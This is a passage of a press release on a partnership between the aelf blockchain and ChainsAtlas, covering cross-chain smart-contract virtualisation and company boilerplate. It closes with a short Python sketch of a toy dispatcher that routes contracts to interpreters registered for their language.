This cross-chain functionality is accomplished through ChainsAtlas' virtualisation technology, allowing aelf to interpret and execute smart contracts written in other languages supported by ChainsAtlas, while also establishing state transfer mechanisms that facilitate seamless data and asset flow between aelf and other blockchains. Through this partnership, the aelf blockchain's capabilities will be enhanced as it becomes able to support a more comprehensive range of dApps and games, and developers from diverse coding backgrounds will be empowered to build on the aelf blockchain. The partnership will also foster increased engagement within the Web3 community, as users gain access to a more diverse range of digital assets on aelf. Looking ahead, the partnership between aelf and ChainsAtlas will play a pivotal role in advancing the evolution of aelf's sidechains by enabling simultaneous execution of program components across multiple VUs on different blockchains.

About aelf

aelf is a high-performance Layer 1 featuring multi-sidechain technology for unlimited scalability. The aelf blockchain is designed to power the development of Web3 and support its continuous advancement into the future. Founded in 2017 with its global hub based in Singapore, aelf is one of the pioneers of the mainchain-sidechain architecture concept. Incorporating key foundational components, including AEDPoS (aelf's variation of a Delegated Proof-of-Stake (DPoS) consensus protocol), parallel processing, peer-to-peer (P2P) network communication, cross-chain bridges, and a dynamic side chain indexing mechanism, aelf delivers a highly efficient, safe, and modular ecosystem with high throughput, scalability, and interoperability. aelf facilitates the building, integrating, and deploying of smart contracts and decentralised apps (dApps) on its blockchain with its native C# software development kit (SDK) and SDKs in other languages, including Java, JS, Python, and Go. 
aelf's ecosystem also houses a range of dApps to support a flourishing blockchain network. aelf is committed to fostering innovation within its ecosystem and remains dedicated to driving the development of Web3 and the adoption of blockchain technology.

About ChainsAtlas

ChainsAtlas introduces a new approach to Web3 infrastructure, blending multiple blockchain technologies and smart contract features to create a unified, efficient processing network. Its core innovation lies in virtualization-enabled smart contracts, allowing consistent software operation across different blockchains. This approach enhances decentralized applications' complexity and reliability, promoting easier integration of existing software into the blockchain ecosystem. The team behind ChainsAtlas, driven by the transformative potential of blockchain, aims to foster global opportunities and equality. Their commitment to building on existing blockchain infrastructure marks a significant step towards a new phase in Web3, where advanced and reliable decentralized applications become the norm, setting new standards for the future of decentralized networks.
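Conceptually, a virtualization unit like the one described in this announcement routes each contract to an interpreter registered for its source language. The sketch below is a purely illustrative Python model of that dispatch pattern; the class name, the toy "contracts," and the registration API are hypothetical and bear no relation to ChainsAtlas' or aelf's actual implementations.

```python
# Illustrative model of language-based contract dispatch (hypothetical names).
class VirtualizationUnit:
    def __init__(self):
        self._interpreters = {}  # language -> callable that runs a contract

    def register(self, language, interpreter):
        """Attach an interpreter for one contract language."""
        self._interpreters[language] = interpreter

    def execute(self, language, contract, *args):
        """Route the contract to the interpreter registered for its language."""
        interp = self._interpreters.get(language)
        if interp is None:
            raise ValueError(f"no interpreter registered for {language!r}")
        return interp(contract, *args)

vu = VirtualizationUnit()
# Toy "interpreter": here a contract is just an expression over x.
vu.register("python-expr", lambda contract, x: eval(contract, {"x": x}))

print(vu.execute("python-expr", "x * 2", 21))  # 42
```

The point of the pattern is that the host system only knows the dispatch table; adding support for another contract language means registering another interpreter, not changing the host.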

